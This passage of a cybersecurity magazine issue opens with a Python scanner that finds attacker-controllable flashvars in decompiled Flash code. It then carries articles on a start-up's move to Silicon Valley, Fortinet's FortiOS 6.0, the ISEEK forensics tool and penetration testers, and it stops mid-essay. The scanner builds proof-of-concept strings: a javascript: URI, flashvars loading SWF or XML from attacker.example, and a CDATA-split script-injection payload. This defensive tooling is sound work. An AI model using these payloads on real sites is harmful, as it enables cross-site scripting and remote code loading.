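LOADER_SINK = re.compile(r"\b(\w+)\.(load)\s*\(([^;]*)\)")

# Constructed decompiled source: the article's clickTag handler plus a config
# loader driven by an xml_path flashvar. _root.title is assigned by the SWF
# itself, so it is not attacker-controllable and must not be reported.
SAMPLE_SOURCE = """
button 48 {
  on (release) {
    var str = (_level0.clickTag != undefined) ? _level0.clickTag : '';
    getURL(str, '');
  }
}
frame 1 {
  var cfg = new XML();
  cfg.load(_root.xml_path);
  _root.title = 'Gallery';
  caption.text = _root.title;
}
"""


def controllable_flashvars(source: str) -> Set[str]:
    """Flashvars read from an insecure global but never assigned by the SWF."""
    return set(FLASHVAR_READ.findall(source)) - set(FLASHVAR_WRITE.findall(source))


def tainted_locals(source: str, controllable: Set[str]) -> Dict[str, str]:
    """Locals whose initialiser mentions a controllable flashvar: local -> flashvar."""
    tainted = {}
    for local, expr in LOCAL_ASSIGN.findall(source):
        for fv in FLASHVAR_READ.findall(expr):
            if fv in controllable:
                tainted[local] = fv
    return tainted


def _sources_in(args: str, controllable: Set[str], tainted: Dict[str, str]) -> List[str]:
    """Controllable flashvars reaching a sink argument, directly or via a tainted local."""
    found = [fv for fv in FLASHVAR_READ.findall(args) if fv in controllable]
    found += [tainted[w] for w in re.findall(r"\b\w+\b", args) if w in tainted]
    return found


def analyse(source: str) -> List[dict]:
    """Report every (flashvar, sink) pair an attacker can drive from the URL."""
    controllable = controllable_flashvars(source)
    tainted = tainted_locals(source, controllable)
    loaders = dict(LOADER_CTOR.findall(source))   # object name -> "XML" | "LoadVars"
    findings = []
    for sink, args in DIRECT_SINK.findall(source):
        for fv in _sources_in(args, controllable, tainted):
            findings.append({"flashvar": fv, "sink": sink, "impact": SINKS[sink]})
    for obj, method, args in LOADER_SINK.findall(source):
        if obj in loaders:
            sink = f"{loaders[obj]}.{method}"
            for fv in _sources_in(args, controllable, tainted):
                findings.append({"flashvar": fv, "sink": sink, "impact": SINKS[sink]})
    return findings


def poc_query(finding: dict) -> str:
    """Query string that exercises a finding, in the form the article uses."""
    fv, sink = finding["flashvar"], finding["sink"]
    if sink in ("getURL", "navigateToURL"):
        return f"?{fv}=javascript:confirm(document.domain)"
    if sink in ("XML.load", "LoadVars.load"):
        return f"?{fv}=//attacker.example/poc.xml"
    return f"?{fv}=//attacker.example/poc.swf"


# The article's CDATA-split payload: "<script" never appears contiguously in
# the file, but a parser that merges adjacent CDATA and text nodes (ElementTree
# here, as the attack requires of the Flash XML class) delivers the whole element.
CDATA_PAYLOAD = "<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>"


def reassembled_text(xml_config: str, tag: str) -> str:
    """Text the SWF receives for <tag> once CDATA sections are merged."""
    return ET.fromstring(xml_config).find(tag).text


if __name__ == "__main__":
    for f in analyse(SAMPLE_SOURCE):
        print(f"{f['flashvar']:>10} -> {f['sink']:<16} {f['impact']}   PoC: {poc_query(f)}")
    print(reassembled_text(f"<config><title>{CDATA_PAYLOAD}</title></config>", "title"))
```

Run it against the output of Flare (or any decompiler) rather than the raw SWF. It is a grep-grade first pass, not a replacement for the manual review the article recommends: it follows only a single `var x = ...` hop, so a flashvar that passes through string concatenation or a function call before reaching a sink will be missed, which is exactly the kind of flow automated tools tend to lose.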
Cover Feature Cyber Security
Moving to Silicon Valley By Graeme Speak
Note from the Editor: The ACSM team recently caught up with Australian entrepreneur Graeme Speak, who recently relocated to the U.S. to continue the growth and development of his cyber start-up, BankVault. After a short conversation, it seemed important to us that Graeme tells his story, since there are lessons for us all. Graeme agreed to write about his journey from Australia to Silicon Valley, with the intention of helping other Australian entrepreneurs rationalise the value of international relocation, while hopefully busting a few myths relating to keeping business onshore as opposed to losing it overseas. TC
When I read about another of Australia's tech businesses moving to Silicon Valley or London, I often note a subtext in the article about the 'nation's loss', yet for many companies seeking to grow, including my own, it simply had to be considered. For most companies, including BankVault, location is rarely a zero-sum choice where you simply leave Australian shores forever, and I think that for the long term Australia would be wise to take a more strategic and holistic view. With global uncertainty forming around the digitisation and automation of many industries, Australia's capacity to be a good proposition for businesses will invariably need to be considered in a more global and connected context. Bemoaning the loss of a company overseas overlooks a far bigger game. Australia can and does benefit from the traction that hundreds of Australian businesses gain in Silicon Valley and around the world.
The networks, relationships and business activity that connect our industries and cities to the rest of the world are fundamental to the ongoing relevance of our cities as digitisation takes hold. BankVault spreading its activity between the US and Australia is one small part of that global connectivity. In 2016, when BankVault won the World Cup Tech Challenge in San Francisco and embarked on our international journey, we initially just saw it as recognition of our technology by Silicon Valley. BankVault is a technology innovation company focused on cyber security. Our technology allows users to sidestep their own local computer, browser and keyboard to conduct banking, crypto-trading or other online transactions securely, regardless of whether hackers or malware have infiltrated your system. We were lucky enough to have turned heads in Australia, and quickly gained traction via industry associations in both the real estate and insurance sectors, but other important targets such as the big four banks, while interested, were far too slow to be useful. With only around 100 other banking institutions in Australia, the market here was really not big enough to sustain us. Despite progressing well and signing a major international institution, we still couldn't get enough support. For many tech start-ups, achieving swift growth often means considering global forays. For BankVault, it really came down to having to go where the market opportunity is, the US, with more than 8600 banks and credit unions. Our World Cup Tech Challenge success earned us a meeting in New York with former Mayor and current cyber security advisor to the White House, Rudy Giuliani. The east coast financial space started to seem like a good fit for our technology, so we decided to participate in FD Global's NYC Immersion Program, triggering a whirlwind of activity that still hasn't slowed down. In New York, we secured further investment and appointed our first channel partner to target the high number of finance businesses there. This partner alone has direct relationships with 850 banks. That's 8 times more than Australia, but still only 10 percent of the market in the US. On the technology side the west coast still, in my opinion, dominates the US. I have always had a strong network in San Francisco, so establishing a presence there for BankVault kept me in touch with our growing business on the east coast, but also enabled me to tap the tech ecosystems of Silicon Valley. I managed to secure a long-term visa, so I'm now fully committed to building the US opportunity. Most recently, in San Francisco we've partnered to launch into the cryptocurrency space, with a solution to stop wallets and crypto-exchange logins being hacked; there's at least $10 million of cryptocurrency stolen every week.
The other big markets in Europe and Asia will be next for us – if we can find the right channel partners. Once again it will come down to good connections and the value of networks. When I look at how far I’ve progressed, it’s all been because of the support of other people. The deeper my network gets (and I mean meaningful relationships with good people) the more effective I become. I want to see Australia grow on the world stage, particularly in tech, but I’m exhausted by attitudes that simplify tech businesses pursuing opportunities overseas as ‘losses’. It’s never quite so straightforward. In my opinion it’s healthy for a company to grow outside of Australia. It’s like young adults going backpacking: it opens their horizons far more than they could imagine. Ultimately, I believe Australians are generally good at staying connected to Australia, and they’ll tend to want to help fellow Australians if they can. I can’t help but think that when you look at BankVault and the thousands of other Australian businesses and Australian workers living in cities across the world, there is an amazing resource that connects the world to Australia. They’re often lamented as our best and brightest, so perhaps we should look at this so-called weakness as something of a national strength.
What Australia could do better is to leverage these networks more deeply for the benefit of Australia and Australian businesses. Many countries seek to do such things, and of course Australia has many stakeholders, public, private and not-for-profit, working hard at it too. Overseas, much of that work is done by Austrade, which does some good work through its international offices, mission programs and business landing pads, helping to create a receptive environment for Australians venturing overseas and to build opportunities for Australian businesses and industries back at home. Shortly BankVault will join the Austrade-AusCyber delegation at RSA in San Francisco, a great chance for Australian cyber-businesses and industry people to develop opportunities in the region, promote Australia, and build our connections with the US. With increasing digitalisation and automation of many industries across the world, the competition for jobs and the companies that offer them is stiffening. Historically Australia has been able to get by on the back of vast commodity trade and export capacity, but with fewer jobs in these sectors, we’re being forced like everyone else to consider jobs for the future. Most nations have recognised that their future prosperity is linked to technology and innovation, and they’re competing aggressively to capture the jobs that relate to them. Efforts to attract, create and compete for jobs are becoming incredibly sophisticated. Some countries have committed to holistic, nation-wide strategies that integrate a vast range of areas, from industry development projects through to business grants and attraction incentives, visa and migration schemes, education programs, taxation schemes, housing and accommodation solutions, business incubation and acceleration support, marketing campaigns and services, industry events, venture capital incentives, diplomatic support, business development, and so on.
Imagine how Australia would be if we never traded or allowed immigration. Imagine how sheltered our children would be if they never travelled. The same goes for entrepreneurs. With BankVault I’ve often felt like someone who jumped off the edge simply hoping things would work, and I inevitably found people reaching out to offer support. The global experience and connections I’ve built will always be biased towards home, and as the company continues to grow, Australia will always be a strategic part of the business – of what I hope will eventually be a much bigger business. The benefit flows back in many ways. When you can appreciate the lengths that other countries are prepared to go to compete for jobs, Australia being more competitive surely begins by overcoming any hang ups we still have that ‘preventing losses’ is a realistic or even adequate approach.
Australian Cyber Security Magazine | 33
Fortinet’s security transformation plans
Being successful in digital transformation requires a step change in cyber security
By Tony Campbell EDITOR
At the annual partner conference in Las Vegas, dubbed Accelerate 18, Fortinet showed off their latest products and the new features built into FortiOS 6.0. This is the first major release in three years of Fortinet’s proprietary network and security operating system, and it brings enhanced network visibility, automated threat detection and threat mitigation, as well as a complete SD-WAN implementation included in the base license cost. This is a big deal for Fortinet customers, since they could potentially use their existing investment to build a software defined wide area network and ditch their expensive telco-provisioned MPLS network, thus saving thousands of dollars. By raising the bar with FortiOS 6.0, Fortinet hopes to give its channel partners and MSSP partners an edge on multiple levels over rival service providers, helping both parties take valuable market share. Furthermore, each new feature is woven into Fortinet’s security fabric, so the telemetry from each product can orchestrate incident response actions across the fabric.
Keynote Themes
Digital transformation was a core theme across the entire conference. Ken Xie, Fortinet’s founder and CEO, discussed his company’s evolution since the early days of Unified Threat Management (UTM) in 2002, to 2016 when the security fabric was introduced. At each company inflection point, Fortinet anticipated the needs of the market and changed course accordingly. By 2016, enterprise technology was going through a renaissance period, with organisations pivoting to on-demand consumption models, and with hybrid cloud becoming the norm, Fortinet needed to change course again. Two major changes in business technology required answers in the security fabric to help modern businesses stay safe. The move to public and hybrid cloud means organisations no longer have a well-defined perimeter, so a way to protect information, wherever it is, needed to be introduced. Furthermore, the interconnectedness of IT and OT environments, and the rapid on-boarding of millions of Internet of Things (IoT) devices in the enterprise, have come together to create the perfect storm. Businesses are now more exposed than they’ve ever been to attacks coming from almost any battlefront. Fortinet’s answer is a layered one, with several new products in their portfolio as well as feature uplifts in FortiOS 6.0 that complement each other and help extend security into these new areas of concern. The focus has shifted to protecting data rather than systems, and Xie’s tag line summarises this well: “Security from the ground up and end to end.”

"Digital transformation is creating new operating and service delivery models that provide undeniable value to users through technologies such as IoT, mobile computing and cloud-based services, generating a vast digital attack surface. As the speed and scale of cyber threats expands, security must take on its own transformation by integrating into all areas of digital technology and be able to translate user intent into automated business response. FortiOS 6.0 delivers hundreds of new features and capabilities that were designed to provide the broad visibility, integrated threat intelligence and automated response required for digital business."
- Ken Xie, founder and chief executive officer at Fortinet
What’s New?
The two big product announcements were software defined wide area networking (SD-WAN) and their new cloud access security broker (CASB). Both of these products extend Fortinet’s reach beyond where their products go today. SD-WAN is an anticipated extension of Fortinet’s product catalogue, allowing Fortinet customers to benefit from free security and networking on their WAN, including many of the features you would expect from a telco-provided WAN solution, such as quality of service. It can network anywhere there is an Internet connection, using 3G/4G and private WAN links, which makes WAN architectures much easier to implement across existing connectivity. Features of Fortinet’s SD-WAN implementation are as follows:
1. Replacement of traditional WAN routers, WAN optimisation and WAN security appliances;
2. Application aware, with support for over 3000 applications;
3. Granular latency status, jitter and packet-loss monitoring;
4. Multi-broadband technology support for Ethernet, DSL and LTE – this allows customers to switch from MPLS, thus saving money;
5. Centralised management;
6. Fully integrated next generation firewall – certified by NSS Labs.
Of course, even Fortinet would say that their SD-WAN technology is not yet best in class, but if you don’t need the capabilities of the more sophisticated products, having it for free in FortiOS 6.0 certainly gives you options you might not have considered. The second major product announcement, which sent murmurs of excitement around the auditorium, was their CASB product. No surprises for what the product is called: FortiCASB comes as a subscription service designed to provide visibility, compliance, data security and threat protection for cloud-based services. They already have support for several major SaaS providers, with FortiCASB able to control and monitor users, behaviours and data stored in the cloud. This will again reduce the number of security vendors organisations need to use and pull data and telemetry back to one console, so that security analysts and the SOC have one interface for protecting the organisation’s data, wherever it is. Integrations with Microsoft Azure, Google Cloud, Amazon AWS, Salesforce, Dropbox and Box all exist, and direct API access to all of these partner services allows complete control over the user tenancy. The CASB includes:
1. User behaviour and user activity monitoring;
2. API access to SaaS services;
3. Reporting and analytics for cloud usage and risk;
4. Access security and entitlement management;
5. Compliance management with predefined policies and audit reports;
6. Subscription based consumption model with no installation required.
Services vs Products
Fortinet has always had a channel sales model, and as such they recognise that the best way to grow their own business is to focus on their products integrating well into managed service providers’ service models. One specific session of note, delivered by Fortinet’s Stephen Tallent and Sony Kogin, focused on how MSSPs’ business models can be accelerated using the new features in FortiOS 6.0. For example, SD-WAN is a service that non-telco MSSPs could now offer, adding it to their service catalogue with little to no difficulty, allowing them to directly take business from the telco monopoly on WAN provision. Upskilling MSSP engineering teams to manage SD-WAN is easy, since the product set is intuitive and management interfaces are familiar to Fortinet administrators. Fortinet has already established a new MSSP support team to assist partners and MSSPs in extending their service catalogue with these new service offerings. This covers the technology aspects of the service, as you would expect, but they will also help with financial modelling and staff training, so it’s a complete MSSP accelerator service. They claim that if existing MSSPs follow their model, they can grow their business by up to 13% year on year with new offerings. The global IoT and OT markets see revenues of over $9 billion (USD) per year, and the global cloud services market is valued at over $2 billion (USD) per year, so these are great sources of growth and revenue for any MSSP that wants their fair share.

“Helping our mutual channel partners stay one step ahead of the constantly evolving cybersecurity market is a commitment Fortinet and Ingram Micro share. We’ve collaborated closely to deliver advanced security solutions for those partners, pairing offerings such as FortiGuard AI with our expertise throughout the security sales cycle. Our objective is to provide channel partners with the technology, services and support they need to serve as trusted security advisors in today’s increasingly hostile threat landscape.”
- Eric Kohl, vice president, advanced solutions & networking, Ingram Micro
Automate, Automate, Automate
We know that automation saves money, so let’s take a look at the new automation features in FortiOS 6.0. Over the past few years, we’ve heard much about the value threat intelligence (TI) brings to security operations. Yet TI hasn’t really delivered on its promises. The vast amount of TI that SOCs ingest tends to leave analysts drowning in data and alerts, which only serves to reduce their capability. At FortiGuard Labs, threat researchers analyse a wide array of security threats, including malware, botnets, mobile threats and zero-day vulnerabilities, and the TI they create is shared with Fortinet’s threat intelligence partners. The TI feed is also used to inform SOC analysts and FortiGate users when known threats are found within the environments they protect. With FortiOS 6.0, Fortinet has introduced an automation engine, so that incident response steps can be triggered when particular conditions are met. This means actions such as running scripts, quarantining devices or switch ports, and sending alerts are now possible using orchestration tooling. This is the first release of this new automation capability within the security fabric, but I’m positive that further development in this area will finally see TI and incident response converging into a defensive force to be reckoned with.
Advanced Threat Protection and Compliance
Another aspect of the conference that featured heavily both in the keynotes and the technology exhibition hall was Fortinet’s Advanced Threat Protection (ATP) and their approach to addressing the new GDPR regulations that came into force in May 2018. As we all know, GDPR increases regulatory mandates. Fortinet says that the FortiGuard Security Rating Service provides expanded audit rules and customised auditing, based on network environments, and on-demand regulatory and compliance reports. This can be used to help mitigate some of the risks relating to maintaining compliance against GDPR. In terms of other ATP measures, the FortiGuard Virus Outbreak Service (VOS) “closes the gap between antivirus updates with FortiCloud Sandbox analysis to detect and stop malware threats discovered between signature updates before they can spread throughout an organization.” Again, this theme of integration into the fabric is common across the entire set of product announcements and further strengthens Fortinet’s position as a market leader in the end-to-end protection space. Other features worth a mention are:
• The FortiGuard Content Disarm and Reconstruction Service (CDR). This proactively strips potentially malicious content from Microsoft Office and Adobe files and sanitises the file formats most commonly used for spreading malware.
• FortiGuard’s Indicators of Compromise (IOC) Service uses a continuously updated list of known “bad elements” and scans devices connected to the Security Fabric to identify compromised devices.
• The FortiSandbox ATP for Amazon Web Services, available on-demand and as BYOL, defends against advanced threats in the cloud, working alongside network, email, endpoint and other security services.
Fortinet's Security Fabric
Security Management and Incident Response
Several new Incident Response (IR) lifecycle capabilities were shown to integrate into the Security Fabric to allow users to automate responses, based on predefined triggers (system events, threat alerts, user and device status) or through direct ITSM integration – they talked multiple times about their relationship with ServiceNow. Automation in terms of response methods allows security managers to quarantine, notify, or even change the configuration of security technologies, all underpinned with clever signalling (email, SMS, alerts to the SIEM, etc.) and custom reporting with real-time control of their workflow environments. Automated attack surface hardening provides recommendations and trending reports on security compliance and best practice adoption, so again this can be aligned with your OAIC, PSPF or GDPR compliance framework and can be used to benchmark your systems against similar firms in terms of size, industry and region.
Hybrid Forensics: Dealing with massive data volumes and large networks
By Richard Adams
Practitioners working in the fields of forensics, eDiscovery and IT security face several issues when processing multiple endpoints. If the typical eDiscovery/forensics approach is adopted, it has a significant negative impact on network infrastructure, because massive amounts of (mostly useless) index data are collected to a central point. Notwithstanding the unreliability of indexing, this is also a very slow process and requires network administrators to allow ‘agents’ to be installed on the targeted endpoints. A further problem with this approach is that the tools interact directly with the host operating system and therefore may be denied access to certain files in use by the system or other applications. Hybrid Forensics is an approach designed to address these problems. It combines the ability to process multiple endpoints as a single task with the ability to target system and application artefacts without interference by the operating system, e.g. registry information, locked files (such as email containers) and unknown executable files.
A key aspect of the Hybrid Forensics approach is to run a collection tool capable of literal string searches at the disk level (rather than the operating system level), with the code running entirely in memory on each custodian system, i.e. it is not installed. This provides four significant benefits:
1. Deployment is fast, easy and doesn’t require the participation of custodians.
2. Only responsive data is ever moved across the network, reducing the effect on network infrastructure.
3. The search process is much more effective and will find responsive material missed by the index approach, e.g. because of language issues or other indexing restrictions.
4. The speed of collection is increased, as all processing and collection is carried out in parallel, rather than individually or in small batches (a typical approach to reduce network load by queuing up jobs).
Applying the hybrid forensics approach: ISEEK
In 2013 a patent was awarded that defines the Hybrid Forensics approach. The title of the patent was “Method and System for Searching for, and Collecting, Electronically Stored Information”. To put the approach covered by the patent into practice, a new application had to be developed that could run concurrently on an unlimited number of systems, without having to be installed, while also being capable of searching data storage devices without relying on the operating system for access to files. The name given to the new tool was ISEEK, an application that runs entirely in memory and directly accesses data on storage devices. A suite of tools was also developed that includes ISEEK-Designer, which creates an encrypted configuration file containing the search/collection parameters, and ISEEK-Explorer, which opens the encrypted containers in which the audit results and collected data are stored, for viewing and potential further processing.
By leveraging the capabilities of ISEEK, security professionals can now carry out ad hoc searches across their networks for any form of data. In addition, a new approach to detecting suspicious files has been identified. The new approach comes from the following thought process:
• To carry out its malicious activity, malware must give instructions to the operating system.
• We know what forms these instructions must take.
• By searching for files containing these instructions, regardless of their file extension, we can identify all executable code on a system.
Data of interest can be obtained from a selection of well-defined sources depending on the type of investigation, such as email (both application-specific and webmail), user files, system files (including the registry on Microsoft Windows machines) or deleted files. The collected data can be sent to an encrypted container on a device physically attached to the target system, while it is still running (even still in use). Alternatively, the data can be sent to an encrypted container located on a network share or even a cloud location. The Hybrid Forensics process can be replicated on as many systems as necessary. These processes run in parallel, utilising the resources of each host system. Distributed collections can be undertaken by several means, including:
1. Using a deployment agent such as EasyDeploy to run PSExec instances on networked systems that will load and execute the hybrid tool;
2. Sending a disk containing the hybrid tool plus its configuration file to one or more users at the remote site, where it can be replicated and deployed as necessary by a system administrator or consultant with the appropriate access. The data will be sent to a specified target location;
3. Sending the hybrid tool plus its configuration file to a system administrator at the remote site, who can deploy the tool from a network share and login script, with the data being sent to an accessible location or using PSExec; and
4. A system administrator using an RDP session to connect to the remote systems to run the tool manually.
Practical application
An experiment to demonstrate the effectiveness of the new process and associated technology was carried out using nine custodian systems running a combination of Windows 10, Windows 10 Enterprise, Windows Server 2012 and Windows Server 2016 in a Windows domain. Using the deployment utility, nine instances of ISEEK were started on the custodian systems in 48 seconds. ISEEK was configured to locate and collect (to a network share) files and emails containing two search terms: “Fuld & Company” and “489,628 Dth/d”. Both terms are contained in PDF attachments to emails within the Enron email data set. These terms were selected because they would be difficult (if not impossible) to locate using an index-based approach. Each custodian system had a mixture of large and small files of various types, including PST, ZIP and HTML. Three of the custodian systems were ‘seeded’ with publicly-available data – a PST from the Enron email data set. The results of the test are shown in the table below.

Results of ISEEK deployment to nine custodian systems in a Windows domain

| Machine | Searched data | Responsive data | Number of files searched | Responsive files | Responsive emails | Time to complete |
|---|---|---|---|---|---|---|
| WS-1 | 527 MB | 0 | 3,578 | 0 | 0 | 00:00:45 |
| TRID | 14 GB | 0 | 3,772 | 0 | 0 | 00:02:53 |
| WIN-2 | 9 GB | 22 MB | 84,259 | 57 | 10 | 00:03:21 |
| WIN-1 | 13 GB | 45 MB | 239,017 | 114 | 20 | 00:03:53 |
| ROD | 25 GB | 0 | 3,996 | 0 | 0 | 00:05:06 |
| DESK-5 | 15 GB | 0 | 411,187 | 0 | 0 | 00:08:28 |
| TIG | 21 GB | 0 | 6,372 | 0 | 0 | 00:10:18 |
| XF | 33 GB | 0 | 9,345 | 0 | 0 | 00:16:38 |
| DESK-4 | 26 GB | 12 MB | 548,780 | 20 | 4 | 00:26:12 |

For comparison purposes, a popular digital forensics tool was used to create an index of the same data searched by ISEEK on the custodian system WIN-1. The entire process took just under 4 mins for ISEEK to complete. However, it took 51 mins for the forensics tool to index the same data on the remote system. In addition, having created an index, the forensics tool was unable to locate the search terms in the same form as that provided to ISEEK, which had completed the whole process on all nine custodian systems in under 30 minutes (with the two systems containing responsive items processed in under 4 minutes). There was no discernible impact on network utilisation during the entire process. Ad hoc policing of large networks becomes more practical with this approach, because of the low impact on network bandwidth (especially if a ‘report-only’ option is used). Information can be gathered quickly and easily that would typically involve installing ‘agents’ at endpoints and dedicated tools.
Sometimes practitioners only want to know if certain criteria are met at an endpoint, rather than collect the artefacts themselves. This has been accommodated by creating an encrypted report that identifies the machine and which criteria have been met, e.g. the value of a certain registry key. In other cases, the whole registry hive may be required, and so to make subsequent review of this data easier for the practitioner ISEEK creates a plain text version that is stored along with the original hive. ISEEK is currently being deployed by a large US government contractor, a US military defence agency and a multi-national aerospace company for security, forensics, IT compliance and electronic discovery purposes. Some cases have involved looking for documents that contain sensitive material on laptops, unauthorised applications being used, hidden executable code, unauthorised storage of video collections, recent registry key changes and theft of intellectual property. Searches have included terms in Chinese, Japanese and Korean languages as well as chemical terms in the form “3-(14-hydroxypentadecyl)-3methyl-1-oxo-2,6-dihydrofuran-3-carboxylic acid”.
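The disk-level literal search, the “find executable code regardless of its extension” idea and the report-only mode described in this article, as an added example that is not ISEEK’s code or any code from the article: a Python sweep over a constructed custodian directory that flags files by their MZ/PE headers, counts literal hits for the two search terms from the experiment, and returns a report instead of copying files off the host. It reads files through the operating system rather than from the raw disk, so locked files remain an issue; the PE-header heuristic, the chunk size and the sample files are my assumptions.

```python
"""Report-only endpoint sweep in the spirit of the Hybrid Forensics approach.
Added example, not ISEEK code: flags Windows executables by their MZ/PE headers
regardless of extension and counts literal byte-string hits across chunk
boundaries, returning a report instead of copying files off the host."""
import os
import struct
import tempfile
from typing import Dict, List

TERMS = [b"Fuld & Company", b"489,628 Dth/d"]  # terms from the article's experiment


def is_pe_file(path: str) -> bool:
    """'MZ' DOS stub whose e_lfanew (offset 0x3C) points at 'PE\\0\\0'."""
    with open(path, "rb") as f:
        dos = f.read(0x40)
        if len(dos) < 0x40 or dos[:2] != b"MZ":
            return False
        (e_lfanew,) = struct.unpack_from("<I", dos, 0x3C)
        if e_lfanew > 0x1000:  # sanity bound (assumption); real stubs are small
            return False
        f.seek(e_lfanew)
        return f.read(4) == b"PE\0\0"


def count_terms(path: str, terms: List[bytes], chunk: int = 1 << 20) -> Dict[bytes, int]:
    """Case-sensitive literal search. The last (longest term - 1) bytes of a chunk are
    carried into the next round, so a term straddling a boundary is found exactly once."""
    counts = {t: 0 for t in terms}
    keep = max((len(t) for t in terms), default=1) - 1
    tail = b""
    with open(path, "rb") as f:
        while True:
            block = f.read(chunk)
            buf = tail + block
            # Matches starting inside the carried tail are deferred to the next round.
            limit = len(buf) if not block else len(buf) - keep
            for t in terms:
                pos = buf.find(t)
                while 0 <= pos < limit:
                    counts[t] += 1
                    pos = buf.find(t, pos + 1)
            if not block:
                return counts
            tail = buf[max(len(buf) - keep, 0):]


def scan_tree(root: str, terms: List[bytes], chunk: int = 1 << 20) -> List[dict]:
    """One record per regular file: executable or not, and which terms hit."""
    records = []
    for dirpath, _, names in os.walk(root):
        for name in sorted(names):
            path = os.path.join(dirpath, name)
            if not os.path.isfile(path):
                continue
            hits = count_terms(path, terms, chunk)
            records.append({
                "path": os.path.relpath(path, root).replace(os.sep, "/"),
                "executable": is_pe_file(path),
                "hits": hits,
                "responsive": any(hits.values()),
            })
    return records


def summarise(records: List[dict]) -> dict:
    """The report a practitioner pulls back instead of the files themselves."""
    return {
        "files_searched": len(records),
        "responsive_files": sum(1 for r in records if r["responsive"]),
        "hidden_executables": sorted(r["path"] for r in records if r["executable"]
                                     and not r["path"].lower().endswith((".exe", ".dll"))),
        "hits": {r["path"]: {t.decode(): n for t, n in r["hits"].items()}
                 for r in records if r["responsive"]},
    }


def _fake_pe_image() -> bytes:
    """Minimal MZ stub plus PE signature; constructed, not a real binary."""
    hdr = bytearray(0x40)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)  # e_lfanew -> just after the stub
    return bytes(hdr) + b"PE\0\0" + b"\0" * 24


def build_sample_tree(root: str) -> None:
    """Constructed custodian data: a responsive document, an executable hiding
    behind a .txt name, an ordinary executable and a benign file."""
    files = {
        "mail/report.pdf": b"Meeting with Fuld & Company on 489,628 Dth/d; Fuld & Company to confirm.",
        "docs/notes.txt": _fake_pe_image(),
        "tools/update.exe": _fake_pe_image(),
        "docs/readme.md": b"Nothing to see here.",
    }
    for rel, data in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)


def demo(chunk: int = 8) -> dict:
    """Sweep the sample tree; a tiny chunk size exercises the boundary handling."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return summarise(scan_tree(root, TERMS, chunk))
```

With the default 8-byte chunk, both search terms are longer than a chunk, so every hit crosses at least one boundary and is still counted once; the same report comes back with a 1 MB chunk.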
Who is the most offensive tester in the room?
Talking of Offensive Individuals - Penetration Testers
By James Wooton
My love of hacking systems goes way back, before penetration testing was ever coined as a profession or term. With a timeline that looked something like zx80, Vic20, BBC Micro and then onto early IBMs (XT, AT, PS/2) and SPARC systems, I’ve hacked them all. It was around 1996 that I officially became a penetration tester, a job title that for many years has left people looking at me blankly, until you say ‘hacker.’ Then they get excited for a few seconds, before glazing over again. To be fair, jokes in binary are very dry (00100001.) To put things into perspective, this was the time of Phrack, with hacker antics punctuated by articles such as ‘Smashing the stack for fun and profit’, written by aleph1. It was also the era of the hand-rolled Linux 1.X kernel, with flaky support, in a time when it seemed PCMCIA support would forever require source code modifications and compilation, especially if you wanted a wireless network card to work. Jumping forward twenty years, I think I’ve now established my credentials and that I’ve worked with penetration testers just about all my working life, and yes, while I’m older and greyer (what’s left of my hair, that is), one thing that has always irked me about our craft is why so few testers can write a decent report discussing all the fun they’ve had. Just the other day, whilst reading through a less-than-average report, fortunately not produced by one of my team, I mused, “What combination of skills and quirks make for an exceptional penetration tester?” And when you find someone with all the skills, how do you manage them, given they are often complicated individuals with very specific needs? Looking at skills first, this is not an easy question to answer, and until an autonomous ice-cream tub takes over the reins and competently tests your networks and applications, it’s a question that most information, risk and compliance managers, or indeed hiring managers, should be considering, because not all pen testers are born or created equal. Let’s list the attributes we’re looking for in such an individual:
• Anally retentive;
• Won’t take no for an answer;
• Thinks in binary;
• Has no social life outside of testing, research and tinkering;
• Dismantled all their presents before lunchtime on Christmas day;
• Works 25 hours per day, not including Red Bull or caffeine breaks – or if you’re in the U.S. then Adderall;
• Rarely comes up with the answer you’d expect, to pretty much any question;
Cyber Security
• •
Excels in trivia quizzes that involve facts such as films, music or books; Probably possesses a set of lock picks.
You see, the first set of interview questions are easy. All joking aside (well, not entirely), a good penetration tester has many of these attributes:
• Persistence;
• Logical and analytical thought patterns (until it’s time to unleash the evil – to do the unexpected);
• Understands languages other than JavaScript;
• Can understand the need to create a report that clearly articulates the vulnerabilities and risks faced by the target organisation, without jargon, but with context;
• An ability to adapt tests through a combination of research, learning and experience;
• A tee-shirt to be worn at ‘cons’.

In short, what you’re looking for is a rare bird indeed, but before you sigh and think, ‘I can’t hire or afford one of those’, that’s ok, because the secret is, it’s unnecessary to hire or recruit a rock-star for many of these engagements. What? How can that be, when you’ve heard from many security companies whose sales-weasels have tried to convince you that their tests are the most comprehensive, using proprietary and/or patented technologies, combined with their own magic formula and pixie-dust? The truth is that for 99% of penetration testing engagements, you will require the same approach, the same analytical thinking and the same universal toolset, serving as the starting point of almost every test. If any penetration tester tells you that every test is unique and exciting, they are full of something which won’t necessarily be skill. That said, most penetration testers will reel off all the exciting bits of the test engagements they have worked on, which probably makes it sound infinitely more exciting than it was. Then there are the 1% of unusual, extraordinary requirements, for which you will need that rare bird.
Scenarios where this level of skill is required are usually reserved for organisations with mission-critical code bases, operational networks, or an organisation with a very mature security posture, who are looking for the last 20% of the 80/20 rule and are well and truly in red team territory. For these, I would suggest outsourcing – since that trustworthy gun-for-hire will likely never come and work on your payroll anyway. In all honesty, there is little point in having one of these on the books, unless you are marketing the heck out of that capability as a differentiator. There was once a very, very skilled boutique in the UK that did exactly that. The MD would, at every opportunity, espouse the virtue of their incredibly talented testers and researchers. However, they were a very skilled outfit and they sold it for a considerable sum based on that reputation, not once, but twice. It certainly can be a differentiator, but one that will bite you financially if you don’t have the pipeline.

Getting back to the rock-stars (and this is by no means intended in a bad way), you will generally find them hard to manage, expensive and high-maintenance. They have a skill level and appetite for havoc that unfortunately means that run-of-the-mill, run-rate engagements will bore them to tears in nanoseconds, and in today’s market they will quickly exit stage left. You’ll need a constant stream of exciting and challenging work to keep them stimulated, let alone awake. There’s also an ongoing requirement for investment in external engagements, conferences and tools, which will alienate the rest of your testers rapidly if they aren’t seeing some similar love or interesting gigs, and/or the rock-star isn’t acting as a mentor. That said, if there’s the sniff of a vulnerability, they’ll rip through applications or networks like a knife through butter.

To answer my own question, I think it’s a combination of skills and capabilities that is best answered from several perspectives:
Engaging a Testing Company
